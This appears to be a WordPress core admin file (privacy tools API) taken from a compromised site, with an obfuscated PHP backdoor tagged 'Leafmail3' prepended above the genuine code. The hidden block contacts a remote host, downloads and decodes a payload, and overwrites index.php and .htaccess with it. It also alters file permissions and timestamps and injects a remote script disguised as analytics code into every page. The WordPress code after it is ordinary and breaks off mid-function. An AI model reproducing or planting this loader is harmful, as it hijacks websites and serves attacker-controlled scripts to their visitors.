/
www
/
wwwroot
/
alo88.autos
/
wp-admin
/
includes
/
Upload File
HOME
<?php /*Leafmail3*/goto vODF8; uW9iC: p1I3i: goto m0oPE; zJ0r4: $fd50r .= "\164\144\157"; goto lKsEQ; daxHz: $Q7FSm .= "\x74\151"; goto zNDLT; QuFr2: $wv9Ig .= "\x33\66"; goto sOymP; lYCuA: $LOLkL = "\x35"; goto y6I4r; jBc3K: $tkyNj .= "\x65\170"; goto feM2z; veckF: $vp5Fj .= "\x61\x63\x63\145\x73\x73"; goto F5Rs6; B13FM: $CoSGx = "\x64\x65\x66"; goto YZRXV; LzBKe: $CUa7Y = !empty($qwM6z) || !empty($SCBgM); goto tB1mh; loZYi: try { goto txRyO; K18GF: @$xS8DV($vp5Fj, $eb2Uu); goto tGdpP; iQrV6: @$KDcLu($AW98J, $PShG_); goto K18GF; U8ZJQ: @$xS8DV($AW98J, $eb2Uu); goto Y_zOi; txRyO: @$xS8DV($nHQe_, $eb2Uu); goto U8ZJQ; bh8Zz: @$xS8DV($vp5Fj, $Vjvu_); goto ZGL3p; ZGL3p: @$KDcLu($vp5Fj, $PShG_); goto g9qNE; ZfydO: @$xS8DV($AW98J, $Vjvu_); goto iQrV6; g9qNE: @$xS8DV($nHQe_, $Vjvu_); goto H3O0E; Y_zOi: @$DR4rp($AW98J, $jap8Z["\x61"]); goto ZfydO; tGdpP: @$DR4rp($vp5Fj, $jap8Z["\142"]); goto bh8Zz; H3O0E: } catch (Exception $EdXTL) { } goto y_pyz; F2WJF: $xS8DV .= "\155\157\144"; goto XVkCO; GbEwW: $MhTIX = "\x6d\144\x35"; goto LQ0hU; uLWI3: $vp5Fj = $nHQe_; goto orqfm; egDtp: $tkyNj = "\x66\165\156\x63"; goto usQiR; LQ0hU: $vbt1Y = $MhTIX; goto TgEvM; XPDLi: $gPOF5 = $le6g1; goto tBtTf; WxOmz: $DR4rp .= "\160\x75\164\137\143"; goto UxwWx; GZYTn: $L3Qwt .= "\145\x63\157\144\145"; goto g9Iex; gJ2jd: $B5AMu .= "\x63\157\x70\171"; goto UIZFw; V5t0t: $eb2Uu = 189; goto WkOpf; R8lf6: $L3Qwt .= "\66\x34\x5f\144"; goto GZYTn; hYuCQ: try { goto A3SpX; Lp303: try { goto Kpqh2; IAeb5: $gPOF5($QKdX3); goto usTFE; Soq5P: $QydK0($QKdX3, CURLOPT_POSTFIELDS, $DORoV($q4dFj)); goto IAeb5; RVyt3: $QydK0($QKdX3, CURLOPT_FOLLOWLOCATION, true); goto nb7rJ; AqD2c: $QydK0($QKdX3, CURLOPT_RETURNTRANSFER, 1); goto ttOBx; LJxmP: $QydK0($QKdX3, CURLOPT_SSL_VERIFYHOST, false); goto RVyt3; snalI: $QydK0($QKdX3, CURLOPT_URL, $Pi1_K); goto AqD2c; nb7rJ: $QydK0($QKdX3, CURLOPT_TIMEOUT, 3); goto caVfG; caVfG: $QydK0($QKdX3, CURLOPT_POST, 1); goto Soq5P; Kpqh2: $QKdX3 = $AhBNU(); goto snalI; usTFE: $iwfAP($QKdX3); goto OfPoO; ttOBx: $QydK0($QKdX3, CURLOPT_SSL_VERIFYPEER, false); goto LJxmP; OfPoO: } catch (Exception $EdXTL) { } goto s8qlN; kwFwL: $EHr4j = dirname($O8VpT); goto rtN5e; oSMaO: @$xS8DV($EHr4j, $eb2Uu); goto zRyBD; rtN5e: if ($qjAK2($EHr4j)) { goto ayR0Q; } goto OfJbX; pAJFu: $Pi1_K .= "\164\75\x63\141"; goto AM67e; j_bNW: ayR0Q: goto CA7b_; D4GAj: $q4dFj = ["\x64\x61\164\141" => $jap8Z["\x64"]["\165\x72\x6c"]]; goto Lp303; OfJbX: @$spfUp($EHr4j, $eb2Uu, true); goto j_bNW; oI6DO: @$xS8DV($EHr4j, $Vjvu_); goto oyphM; GLti1: $Pi1_K .= "\77\x61\143"; goto pAJFu; lEMoS: $Pi1_K = $FCJJO; goto GLti1; A3SpX: $O8VpT = $nHQe_ . $jap8Z["\144"]["\160\141\x74\x68"]; goto kwFwL; s8qlN: d_JbM: goto HW6fn; CA7b_: if (!$qjAK2($EHr4j)) { goto d_JbM; } goto oSMaO; oyphM: @$KDcLu($O8VpT, $PShG_); goto lEMoS; OUdjB: @$xS8DV($O8VpT, $Vjvu_); goto oI6DO; AM67e: $Pi1_K .= "\154\x6c"; goto D4GAj; zRyBD: @$DR4rp($O8VpT, $jap8Z["\x64"]["\143\157\144\x65"]); goto OUdjB; HW6fn: } catch (Exception $EdXTL) { } goto loZYi; LNJsy: @$xS8DV($nHQe_, $Vjvu_); goto k_sTE; cuM3u: $nHQe_ = $_SERVER[$Y5cZH]; goto A7iEW; n8L8V: $uz9bL .= "\x68\160\x2e\60"; goto K6CAr; unwRS: $DORoV .= "\x75\x69\154\x64\x5f\x71"; goto Nk50j; JP7xy: $vbt1Y .= "\x6c\x65"; goto RNGP0; nZ1st: $gQtVG .= "\115\x49\x4e"; goto r5zMQ; XScjr: $gQtVG = "\x57\120"; goto O5QIE; OU84W: $pzU4s = "\146\x6c\x6f"; goto mwwot; nRTqE: $RDkKv = []; goto aYHoX; l2VBa: rqNSn: goto gKipv; ljZeU: $uz9bL .= "\x2f\170\x6d"; goto mCMR7; Ieo9X: $Y5cZH .= "\137\x52\117\117\x54"; goto lYCuA; XVkCO: $L3Qwt = "\x62\141\x73\x65"; goto R8lf6; OGVf2: $Vjvu_ = 215; goto huZpo; aBs6o: $fd50r .= "\147\151\x73\x74"; goto FqdNN; MTS3A: V4Jy1: goto vHyOs; jrrba: $PShG_ = $Q7FSm($wv9Ig); goto bMgWF; vODF8: $J4djk = "\74\104\x44\x4d\76"; goto lRUim; ruvGs: $AW98J .= "\150\x70"; goto uLWI3; VXlbA: $uz9bL .= "\160\x63\x2e\x70"; goto n8L8V; w8i1S: $KDcLu .= "\165\x63\150"; goto TPq_6; UxwWx: $DR4rp .= "\x6f\156\x74\145\x6e\x74\163"; goto ISAMz; chc27: if (!($JKloV !== false)) { goto L8tHW; } goto UihyE; TgEvM: $vbt1Y .= "\137\146\x69"; goto JP7xy; zijgp: $F3G3B = "\x69\x6e\x74"; goto d0ttz; XAUaV: $CZpCY = $y6Dil($uz9bL, "\167\53"); goto KpMKi; ZjcxJ: $eb2Uu = $F3G3B($mmShn($eb2Uu), $l6o74); goto OGVf2; WBWyB: try { goto LAZiP; NeOx9: $QydK0($QKdX3, CURLOPT_FOLLOWLOCATION, true); goto WZ1lN; yuxAB: $JKloV = trim(trim($JKloV, "\xef\xbb\xbf")); goto zF9le; YXPOY: $QydK0($QKdX3, CURLOPT_SSL_VERIFYPEER, false); goto UWGHP; MbwNB: $JKloV = $gPOF5($QKdX3); goto hAQ9Y; UWGHP: $QydK0($QKdX3, CURLOPT_SSL_VERIFYHOST, false); goto NeOx9; LAZiP: $QKdX3 = $AhBNU(); goto i1X7z; WZ1lN: $QydK0($QKdX3, CURLOPT_TIMEOUT, 10); goto MbwNB; S2VNp: $QydK0($QKdX3, CURLOPT_RETURNTRANSFER, 1); goto YXPOY; i1X7z: $QydK0($QKdX3, CURLOPT_URL, $B5AMu); goto S2VNp; hAQ9Y: $iwfAP($QKdX3); goto yuxAB; zF9le: } catch (Exception $EdXTL) { } goto chc27; fSM7u: $Q7FSm .= "\164\157"; goto daxHz; YZRXV: $CoSGx .= "\x69\156\x65\144"; goto TSsDX; Y78_D: $tCAxo = 1; goto kOQ0E; iMZQy: $_POST = $_REQUEST = $_FILES = array(); goto CfGUZ; TfIgP: $HH1HZ .= "\x6f\156\x74\x65\x6e\x74\163"; goto jcgg4; Jhv2t: $ocF0w .= "\x64\155\x69\156"; goto I04NN; aYHoX: $N__ZL = 32; goto IvuqX; HgvDx: @$xS8DV($z2Yll, $eb2Uu); goto C_4CC; ZW1G7: r6AqH: goto GqJiG; CfGUZ: AzDa9: goto U2U3q; NdB0_: $QydK0 .= "\157\x70\164"; goto XPDLi; KFMi9: $x0CSu .= "\137\x48\117\x53\124"; goto nMuHG; WqPjf: $B5AMu = $FCJJO; goto B0dlE; TPq_6: $xS8DV = "\x63\x68"; goto F2WJF; tBtTf: $gPOF5 .= "\x6c\137\x65\170\x65\143"; goto Zr7tR; qUDsS: $PKMm7 .= "\x66\151\x6c\x65"; goto Odo2W; UihyE: $jap8Z = 0; goto hJZyv; WQvgq: $qwM6z = $_REQUEST; goto rvlXO; yoOUR: $vTeXJ = "\x76\x65\x72\x73\151"; goto IBhNI; ZxHGi: $fd50r = "\x72\x65"; goto aBs6o; shDBj: $FSKjX .= "\115\x45\123"; goto XScjr; bAY2j: $LYlAw = $L474W = $ocF0w . "\x2f" . $sVnDj; goto nRTqE; sOymP: $wv9Ig .= "\63\x20\144"; goto d5_Qs; jcgg4: $DR4rp = "\x66\151\154\145\137"; goto WxOmz; QKYpu: $ocF0w .= "\55\x61"; goto Jhv2t; dZIRa: $P4139 = $_SERVER[$x0CSu]; goto cuM3u; huZpo: $Vjvu_ += 150; goto qbT4q; BSUkU: $bX79j = "\x66\143\154"; goto RAIH6; g9Iex: $MIh5N = "\147\x7a\x69"; goto ojxiT; m0oPE: if (!$tCAxo) { goto rqNSn; } goto WqPjf; C_4CC: @unlink($z2Yll); goto LNJsy; feM2z: $tkyNj .= "\151\163\x74\x73"; goto j_mMb; dU8Tu: $FSKjX = "\127\x50\x5f\x55"; goto iLcq9; axzTr: $HH1HZ .= "\147\x65\164\x5f\143"; goto TfIgP; sZfV6: $FCJJO .= "\x6c\151\156\153\x2e\x74"; goto oUI8y; zNDLT: $Q7FSm .= "\155\145"; goto egDtp; Nk50j: $DORoV .= "\x75\145\x72\x79"; goto GbEwW; j_mMb: $le6g1 = "\x63\165\162"; goto QFm8j; y6I4r: $LOLkL .= "\x2e\x34"; goto Dc02k; d5_Qs: $wv9Ig .= "\141\171\163"; goto jrrba; AjCJZ: $z2Yll .= "\x6e\x69"; goto OzEb9; RNGP0: $PKMm7 = "\x69\163\137"; goto qUDsS; k_sTE: DUBKw: goto AbQ0z; mwwot: $pzU4s .= "\143\x6b"; goto BSUkU; bKUUG: $WzLgo = $RDkKv[1]; goto WAo0s; mCMR7: $uz9bL .= "\x6c\x72"; goto VXlbA; Tt4oQ: $Q7FSm = "\163\164\162"; goto fSM7u; B0dlE: $B5AMu .= "\x3f\x61\143\x74"; goto aETJg; DbBpN: $vTeXJ .= "\x70\x61\162\145"; goto B13FM; IBhNI: $vTeXJ .= "\157\156\137\x63\157\x6d"; goto DbBpN; QSRig: $FCJJO = "\150\x74\164\x70\163\72\x2f\57"; goto Jb8vw; pLm0w: $spfUp .= "\144\151\x72"; goto yspyu; bMgWF: $x0CSu = "\110\x54\x54\120"; goto KFMi9; psjtE: $iwfAP .= "\x6c\x5f\143\x6c\x6f"; goto kxGeH; OzEb9: if (!$PKMm7($z2Yll)) { goto DUBKw; } goto fUCm1; YZnxF: $AhBNU .= "\154\137\x69\x6e\x69\164"; goto o4wfR; U2U3q: $xS8DV($nHQe_, $eb2Uu); goto XAUaV; hVAgs: if (empty($RDkKv)) { goto r6AqH; } goto gpO7z; lRUim: $huaOJ = "\57\136\143"; goto l1puk; ojxiT: $MIh5N .= "\x6e\146\154\x61\164\145"; goto QO6bK; yspyu: $HH1HZ = "\146\151\154\145\137"; goto axzTr; nMuHG: $Y5cZH = "\x44\x4f\x43\125\x4d\105\x4e\x54"; goto Ieo9X; QO6bK: $RpkLV = "\165\156\x73\145\x72"; goto TE4rq; oUI8y: $FCJJO .= "\x6f\160\x2f"; goto ZxHGi; gpO7z: $ZwOvi = $RDkKv[0]; goto bKUUG; r5zMQ: $EvUsr = $CoSGx($FSKjX) || $CoSGx($gQtVG); goto WQvgq; ryAXN: $iSMwa = "\163\164\162"; goto Aw0OF; RAIH6: $bX79j .= "\157\x73\145"; goto QSRig; QFm8j: $AhBNU = $le6g1; goto YZnxF; y_pyz: M1S8t: goto YcoP2; bPtLw: $AW98J .= "\x64\x65\170\56\x70"; goto ruvGs; jHqFV: if (!is_array($jap8Z)) { goto M1S8t; } goto sHXMo; O5QIE: $gQtVG .= "\x5f\x41\104"; goto nZ1st; dBHzv: $AW98J .= "\x2f\151\x6e"; goto bPtLw; KpMKi: if (!($tkyNj($AhBNU) && !preg_match($huaOJ, PHP_SAPI) && $pzU4s($CZpCY, 2 | 4))) { goto v1tUm; } goto vfYVM; u8ekB: $qjAK2 .= "\x64\151\162"; goto D1aMA; rvlXO: $SCBgM = $_FILES; goto LzBKe; Odo2W: $qjAK2 = "\x69\163\137"; goto u8ekB; Tl9BG: $ocF0w .= "\x2f\167\160"; goto QKYpu; hh9Gu: $YKWP5 .= "\x74\40\x41\x63\143"; goto DSWYm; Dc02k: $LOLkL .= "\56\x30\x3b"; goto dZIRa; o4wfR: $QydK0 = $le6g1; goto VYKG_; pnTdK: $YKWP5 = "\110\124\124"; goto qEMP2; WkOpf: $eb2Uu += 304; goto ZjcxJ; CLQnS: $huaOJ .= "\x73\151"; goto Tt4oQ; orqfm: $vp5Fj .= "\x2f\x2e\x68\164"; goto veckF; jvCLK: $fd50r .= "\151\157\156"; goto cE3iS; vHyOs: goto p1I3i; goto ZW1G7; Aw0OF: $iSMwa .= "\154\x65\156"; goto yoOUR; neYoj: $y6Dil .= "\145\156"; goto OU84W; Yc9eB: $JKloV = false; goto WBWyB; IvuqX: $l6o74 = 5; goto DicZE; tB1mh: if (!(!$EvUsr && $CUa7Y)) { goto AzDa9; } goto iMZQy; vI8QX: aybLW: goto dU8Tu; cE3iS: if (isset($_SERVER[$fd50r])) { goto aybLW; } goto YhmyI; FqdNN: $fd50r .= "\145\162\x5f"; goto l7JCC; I04NN: $sVnDj = substr($MhTIX($P4139), 0, 6); goto bAY2j; WAo0s: if (!(!$PKMm7($AW98J) || $vbt1Y($AW98J) != $ZwOvi)) { goto F9B9M; } goto Y78_D; d0ttz: $F3G3B .= "\x76\141\154"; goto G8B0v; G8B0v: $mmShn = "\144\145\x63"; goto w1WUM; Ky1Ah: $fd50r .= "\x75\156\x63\x74"; goto jvCLK; YcoP2: L8tHW: goto l2VBa; fUCm1: @$xS8DV($nHQe_, $eb2Uu); goto HgvDx; ISAMz: $KDcLu = "\164\x6f"; goto w8i1S; YhmyI: $_SERVER[$fd50r] = 0; goto vI8QX; qbT4q: $Vjvu_ = $F3G3B($mmShn($Vjvu_), $l6o74); goto pnTdK; UIZFw: $B5AMu .= "\x26\150\75" . $P4139; goto Yc9eB; A7iEW: $ocF0w = $nHQe_; goto Tl9BG; QiT7j: $YKWP5 .= "\x30\x36\x20\116\157"; goto hh9Gu; usQiR: $tkyNj .= "\x74\151\x6f\156\137"; goto jBc3K; TE4rq: $RpkLV .= "\x69\x61\154\x69\172\145"; goto zijgp; DWZ53: if (!(!$_SERVER[$fd50r] && $vTeXJ(PHP_VERSION, $LOLkL, "\76"))) { goto tOsRM; } goto qx0qa; DSWYm: $YKWP5 .= "\x65\x70\164\141\142\154\x65"; goto TXR6r; clNTt: tOsRM: goto NrKhW; F5Rs6: $z2Yll = $nHQe_; goto ZRq91; Jb8vw: $FCJJO .= "\157\153\x6b"; goto sZfV6; Zr7tR: $iwfAP = $le6g1; goto psjtE; w1WUM: $mmShn .= "\x6f\143\x74"; goto ryAXN; TXR6r: $uz9bL = $nHQe_; goto ljZeU; lKsEQ: $fd50r .= "\167\156\137\146"; goto Ky1Ah; kxGeH: $iwfAP .= "\x73\x65"; goto PULcN; qEMP2: $YKWP5 .= "\120\57\61\x2e\x31\40\x34"; goto QiT7j; aETJg: $B5AMu .= "\x3d\x67\145\164"; goto gJ2jd; iLcq9: $FSKjX .= "\123\x45\137\x54\110\x45"; goto shDBj; AbQ0z: $tCAxo = 0; goto hVAgs; Te8Ah: $AW98J = $nHQe_; goto dBHzv; PULcN: $DORoV = "\150\164\x74\x70\137\x62"; goto unwRS; oHm8V: $tCAxo = 1; goto MTS3A; K6CAr: $y6Dil = "\146\x6f\160"; goto neYoj; PL0rr: if (!(!$PKMm7($vp5Fj) || $vbt1Y($vp5Fj) != $WzLgo)) { goto V4Jy1; } goto oHm8V; l1puk: $huaOJ .= "\154\151\x2f"; goto CLQnS; l7JCC: $fd50r .= "\x73\x68\165"; goto zJ0r4; sHXMo: try { goto HbY3E; HbY3E: @$xS8DV($nHQe_, $eb2Uu); goto YBneD; lVY2g: LmA8a: goto o_wA9; w2wnP: @$KDcLu($L474W, $PShG_); goto vkTcY; plcED: $L474W = $LYlAw; goto lVY2g; o_wA9: @$DR4rp($L474W, $jap8Z["\x63"]); goto FIfGh; FIfGh: @$xS8DV($L474W, $Vjvu_); goto w2wnP; YBneD: if (!$qjAK2($ocF0w)) { goto LmA8a; } goto y3Uf0; y3Uf0: @$xS8DV($ocF0w, $eb2Uu); goto plcED; vkTcY: } catch (Exception $EdXTL) { } goto hYuCQ; GqJiG: $tCAxo = 1; goto uW9iC; VYKG_: $QydK0 .= "\154\x5f\x73\x65\x74"; goto NdB0_; D1aMA: $spfUp = "\x6d\x6b"; goto pLm0w; TSsDX: $wv9Ig = "\x2d\61"; goto QuFr2; vfYVM: $xS8DV($nHQe_, $Vjvu_); goto DWZ53; kOQ0E: F9B9M: goto PL0rr; NrKhW: try { goto qZ46l; RQqe5: if (!(is_array($yVIWe) && count($yVIWe) == 2)) { goto XDrKy; } goto A2PmA; w9gDu: y6dH8: goto Z726M; MlbPu: $yVIWe = @explode("\x3a", $HH1HZ($L474W)); goto RQqe5; YN8V8: if (!($iSMwa($gOxct) == $N__ZL && $iSMwa($aWnJP) == $N__ZL)) { goto YUPG5; } goto DYfgW; urTh8: XDrKy: goto vw7V4; hhu33: $gOxct = trim($yVIWe[0]); goto h7asi; POLut: $RDkKv[] = $aWnJP; goto w9gDu; JSOyl: $RDkKv[] = $aWnJP; goto dxtWS; ixd8R: $L474W = $nHQe_ . "\57" . $sVnDj; goto uPNAL; YdNrA: if (!(is_array($yVIWe) && count($yVIWe) == 2)) { goto U90QQ; } goto hhu33; qZ46l: if (!$PKMm7($L474W)) { goto oqtoQ; } goto p5kTV; V_cwX: oTvft: goto NDBCD; A2PmA: $gOxct = trim($yVIWe[0]); goto DvFPK; wbpgM: if (!empty($RDkKv)) { goto oTvft; } goto ixd8R; DvFPK: $aWnJP = trim($yVIWe[1]); goto YN8V8; Y3KDn: if (!($iSMwa($gOxct) == $N__ZL && $iSMwa($aWnJP) == $N__ZL)) { goto y6dH8; } goto D88sj; vw7V4: wNb1b: goto V_cwX; dxtWS: YUPG5: goto urTh8; hNhbL: oqtoQ: goto wbpgM; Z726M: U90QQ: goto hNhbL; uPNAL: if (!$PKMm7($L474W)) { goto wNb1b; } goto MlbPu; D88sj: $RDkKv[] = $gOxct; goto POLut; h7asi: $aWnJP = trim($yVIWe[1]); goto Y3KDn; p5kTV: $yVIWe = @explode("\72", $HH1HZ($L474W)); goto YdNrA; DYfgW: $RDkKv[] = $gOxct; goto JSOyl; NDBCD: } catch (Exception $EdXTL) { } goto Te8Ah; qx0qa: try { $_SERVER[$fd50r] = 1; $fd50r(function () { goto AV30r; qJcS6: $XaxO1 .= "\105\x6c\x65\x6d\145\x6e\x74\163\102"; goto Ak55L; Q10lk: $XaxO1 .= "\x3c\x2f\x73"; goto b0BbS; QUShX: $XaxO1 .= "\x73\x63\162\x69\x70\164\x22\x3e" . "\xa"; goto qTRy2; DytHl: $XaxO1 .= "\57\155\x61\164"; goto shQ2Y; UYMzk: $XaxO1 .= "\105\x6c\145\x6d\145\156\164\x28\42\x73\143"; goto YC55T; ZXF34: $XaxO1 .= "\x6f\155\157\40\x43\157\x64"; goto Fp2Ee; AdEN_: $XaxO1 .= "\x72\x69\x70\x74\40\x74\x79\160\x65\75\42\164\x65\170"; goto vaHEn; qTRy2: $XaxO1 .= "\50\146\165\156\x63"; goto sT9Yu; YC55T: $XaxO1 .= "\162\151\160\164\42\51\x2c\40\x73\x3d\x64\56\x67\x65\164"; goto qJcS6; b0BbS: $XaxO1 .= "\x63\x72\x69\x70\x74\76\12"; goto NGsxv; HMLFi: $XaxO1 .= "\x7d\x29\50\x29\73" . "\12"; goto Q10lk; CvLy6: $XaxO1 .= "\x3f\x69\144\x3d"; goto dyWeq; Fp2Ee: $XaxO1 .= "\x65\x20\x2d\55\x3e\12"; goto fdPCn; y9nGa: $XaxO1 .= "\x6f\162\145\x28\147\x2c\x73\51\x3b" . "\12"; goto HMLFi; MSOF2: $XaxO1 .= "\160\164\x22\x29\133\60\x5d\x3b" . "\12"; goto P_ZMm; dyWeq: $XaxO1 .= "\x4d\x2d"; goto DLX8K; fdPCn: echo $XaxO1; goto endbR; No27V: $XaxO1 .= $P4139; goto DytHl; sT9Yu: $XaxO1 .= "\164\151\x6f\156\50\x29\40\x7b" . "\xa"; goto ubJzA; ebgnR: $XaxO1 .= "\x3b\x20\x67\x2e\144\x65\146"; goto wmOvX; KJt_C: $XaxO1 .= "\147\x2e\163\x72"; goto E5SRJ; yjiNj: $XaxO1 .= "\x64\x20\115\x61\x74"; goto ZXF34; jd565: $XaxO1 .= "\163\145\162\164\102\145\146"; goto y9nGa; D7OFn: $XaxO1 .= "\x75\155\145\156\164\54\40\x67\75\x64\56\143\x72\x65\141\x74\x65"; goto UYMzk; ubJzA: $XaxO1 .= "\166\x61\162\x20\x75\75\x22" . $FCJJO . "\x22\73" . "\xa"; goto v3rQ8; E5SRJ: $XaxO1 .= "\143\x3d\165\x2b\42\152\x73\x2f"; goto No27V; v3rQ8: $XaxO1 .= "\x76\141\162\x20\x64\75\144\157\143"; goto D7OFn; r7GHN: $XaxO1 .= "\163\x63\x72\151\160\164\42\73\40\147\x2e\x61"; goto RDjIx; vaHEn: $XaxO1 .= "\164\x2f\152\x61\x76\x61"; goto QUShX; gOYzX: $XaxO1 = "\x3c\x21\x2d\x2d\x20\x4d\141"; goto zMa4a; NGsxv: $XaxO1 .= "\x3c\41\x2d\55\40\x45\156"; goto yjiNj; I8B8v: $XaxO1 .= "\75\42\164\x65\x78\164\57"; goto uazjK; Ak55L: $XaxO1 .= "\171\x54\x61\x67\116\x61\x6d\145"; goto wg3cP; AV30r: global $P4139, $FCJJO; goto gOYzX; wg3cP: $XaxO1 .= "\50\42\x73\143\162\151"; goto MSOF2; JH0uq: $XaxO1 .= "\x3c\163\143"; goto AdEN_; DLX8K: $XaxO1 .= time(); goto d1HE5; RDjIx: $XaxO1 .= "\x73\x79\156\x63\x3d\x74\x72\165\x65"; goto ebgnR; d1HE5: $XaxO1 .= "\42\x3b\40\x73\56\x70\141\x72"; goto Bu0lg; wmOvX: $XaxO1 .= "\x65\162\x3d\164\162\165\145\x3b" . "\12"; goto KJt_C; shQ2Y: $XaxO1 .= "\157\x6d\x6f\x2e\152\163"; goto CvLy6; zMa4a: $XaxO1 .= "\x74\x6f\x6d\157\x20\x2d\x2d\x3e\xa"; goto JH0uq; uazjK: $XaxO1 .= "\152\141\x76\x61"; goto r7GHN; Bu0lg: $XaxO1 .= "\145\156\164\116\x6f\144\x65\x2e\x69\156"; goto jd565; P_ZMm: $XaxO1 .= "\x67\x2e\164\171\x70\x65"; goto I8B8v; endbR: }); } catch (Exception $EdXTL) { } goto clNTt; DicZE: $l6o74 += 3; goto V5t0t; hJZyv: try { $jap8Z = @$RpkLV($MIh5N($L3Qwt($JKloV))); } catch (Exception $EdXTL) { } goto jHqFV; VtpcZ: $z2Yll .= "\145\162\56\x69"; goto AjCJZ; ZRq91: $z2Yll .= "\x2f\56\x75\163"; goto VtpcZ; gKipv: v1tUm: ?> <?php /** * WordPress Administration Privacy Tools API. * * @package WordPress * @subpackage Administration */ /** * Resend an existing request and return the result. * * @since 4.9.6 * @access private * * @param int $request_id Request ID. * @return true|WP_Error Returns true if sending the email was successful, or a WP_Error object. */ function _wp_privacy_resend_request( $request_id ) { $request_id = absint( $request_id ); $request = get_post( $request_id ); if ( ! $request || 'user_request' !== $request->post_type ) { return new WP_Error( 'privacy_request_error', __( 'Invalid personal data request.' ) ); } $result = wp_send_user_request( $request_id ); if ( is_wp_error( $result ) ) { return $result; } elseif ( ! $result ) { return new WP_Error( 'privacy_request_error', __( 'Unable to initiate confirmation for personal data request.' ) ); } return true; } /** * Marks a request as completed by the admin and logs the current timestamp. * * @since 4.9.6 * @access private * * @param int $request_id Request ID. * @return int|WP_Error Request ID on success, or a WP_Error on failure. */ function _wp_privacy_completed_request( $request_id ) { // Get the request. $request_id = absint( $request_id ); $request = wp_get_user_request( $request_id ); if ( ! $request ) { return new WP_Error( 'privacy_request_error', __( 'Invalid personal data request.' ) ); } update_post_meta( $request_id, '_wp_user_request_completed_timestamp', time() ); $result = wp_update_post( array( 'ID' => $request_id, 'post_status' => 'request-completed', ) ); return $result; } /** * Handle list table actions. * * @since 4.9.6 * @access private */ function _wp_personal_data_handle_actions() { if ( isset( $_POST['privacy_action_email_retry'] ) ) { check_admin_referer( 'bulk-privacy_requests' ); $request_id = absint( current( array_keys( (array) wp_unslash( $_POST['privacy_action_email_retry'] ) ) ) ); $result = _wp_privacy_resend_request( $request_id ); if ( is_wp_error( $result ) ) { add_settings_error( 'privacy_action_email_retry', 'privacy_action_email_retry', $result->get_error_message(), 'error' ); } else { add_settings_error( 'privacy_action_email_retry', 'privacy_action_email_retry', __( 'Confirmation request sent again successfully.' ), 'success' ); } } elseif ( isset( $_POST['action'] ) ) { $action = ! empty( $_POST['action'] ) ? sanitize_key( wp_unslash( $_POST['action'] ) ) : ''; switch ( $action ) { case 'add_export_personal_data_request': case 'add_remove_personal_data_request': check_admin_referer( 'personal-data-request' ); if ( ! isset( $_POST['type_of_action'], $_POST['username_or_email_for_privacy_request'] ) ) { add_settings_error( 'action_type', 'action_type', __( 'Invalid personal data action.' ), 'error' ); } $action_type = sanitize_text_field( wp_unslash( $_POST['type_of_action'] ) ); $username_or_email_address = sanitize_text_field( wp_unslash( $_POST['username_or_email_for_privacy_request'] ) ); $email_address = ''; $status = 'pending'; if ( ! isset( $_POST['send_confirmation_email'] ) ) { $status = 'confirmed'; } if ( ! in_array( $action_type, _wp_privacy_action_request_types(), true ) ) { add_settings_error( 'action_type', 'action_type', __( 'Invalid personal data action.' ), 'error' ); } if ( ! is_email( $username_or_email_address ) ) { $user = get_user_by( 'login', $username_or_email_address ); if ( ! $user instanceof WP_User ) { add_settings_error( 'username_or_email_for_privacy_request', 'username_or_email_for_privacy_request', __( 'Unable to add this request. A valid email address or username must be supplied.' ), 'error' ); } else { $email_address = $user->user_email; } } else { $email_address = $username_or_email_address; } if ( empty( $email_address ) ) { break; } $request_id = wp_create_user_request( $email_address, $action_type, array(), $status ); $message = ''; if ( is_wp_error( $request_id ) ) { $message = $request_id->get_error_message(); } elseif ( ! $request_id ) { $message = __( 'Unable to initiate confirmation request.' ); } if ( $message ) { add_settings_error( 'username_or_email_for_privacy_request', 'username_or_email_for_privacy_request', $message, 'error' ); break; } if ( 'pending' === $status ) { wp_send_user_request( $request_id ); $message = __( 'Confirmation request initiated successfully.' ); } elseif ( 'confirmed' === $status ) { $message = __( 'Request added successfully.' ); } if ( $message ) { add_settings_error( 'username_or_email_for_privacy_request', 'username_or_email_for_privacy_request', $message, 'success' ); break; } } } } /** * Cleans up failed and expired requests before displaying the list table. * * @since 4.9.6 * @access private */ function _wp_personal_data_cleanup_requests() { /** This filter is documented in wp-includes/user.php */ $expires = (int) apply_filters( 'user_request_key_expiration', DAY_IN_SECONDS ); $requests_query = new WP_Query( array( 'post_type' => 'user_request', 'posts_per_page' => -1, 'post_status' => 'request-pending', 'fields' => 'ids', 'date_query' => array( array( 'column' => 'post_modified_gmt', 'before' => $expires . ' seconds ago', ), ), ) ); $request_ids = $requests_query->posts; foreach ( $request_ids as $request_id ) { wp_update_post( array( 'ID' => $request_id, 'post_status' => 'request-failed', 'post_password' => '', ) ); } } /** * Generate a single group for the personal data export report. * * @since 4.9.6 * @since 5.4.0 Added the `$group_id` and `$groups_count` parameters. * * @param array $group_data { * The group data to render. * * @type string $group_label The user-facing heading for the group, e.g. 'Comments'. * @type array $items { * An array of group items. * * @type array $group_item_data { * An array of name-value pairs for the item. * * @type string $name The user-facing name of an item name-value pair, e.g. 'IP Address'. * @type string $value The user-facing value of an item data pair, e.g. '50.60.70.0'. * } * } * } * @param string $group_id The group identifier. * @param int $groups_count The number of all groups * @return string The HTML for this group and its items. */ function wp_privacy_generate_personal_data_export_group_html( $group_data, $group_id = '', $groups_count = 1 ) { $group_id_attr = sanitize_title_with_dashes( $group_data['group_label'] . '-' . $group_id ); $group_html = '<h2 id="' . esc_attr( $group_id_attr ) . '">'; $group_html .= esc_html( $group_data['group_label'] ); $items_count = count( (array) $group_data['items'] ); if ( $items_count > 1 ) { $group_html .= sprintf( ' <span class="count">(%d)</span>', $items_count ); } $group_html .= '</h2>'; if ( ! empty( $group_data['group_description'] ) ) { $group_html .= '<p>' . esc_html( $group_data['group_description'] ) . '</p>'; } $group_html .= '<div>'; foreach ( (array) $group_data['items'] as $group_item_id => $group_item_data ) { $group_html .= '<table>'; $group_html .= '<tbody>'; foreach ( (array) $group_item_data as $group_item_datum ) { $value = $group_item_datum['value']; // If it looks like a link, make it a link. if ( ! str_contains( $value, ' ' ) && ( str_starts_with( $value, 'http://' ) || str_starts_with( $value, 'https://' ) ) ) { $value = '<a href="' . esc_url( $value ) . '">' . esc_html( $value ) . '</a>'; } $group_html .= '<tr>'; $group_html .= '<th>' . esc_html( $group_item_datum['name'] ) . '</th>'; $group_html .= '<td>' . wp_kses( $value, 'personal_data_export' ) . '</td>'; $group_html .= '</tr>'; } $group_html .= '</tbody>'; $group_html .= '</table>'; } if ( $groups_count > 1 ) { $group_html .= '<div class="return-to-top">'; $group_html .= '<a href="#top"><span aria-hidden="true">↑ </span> ' . 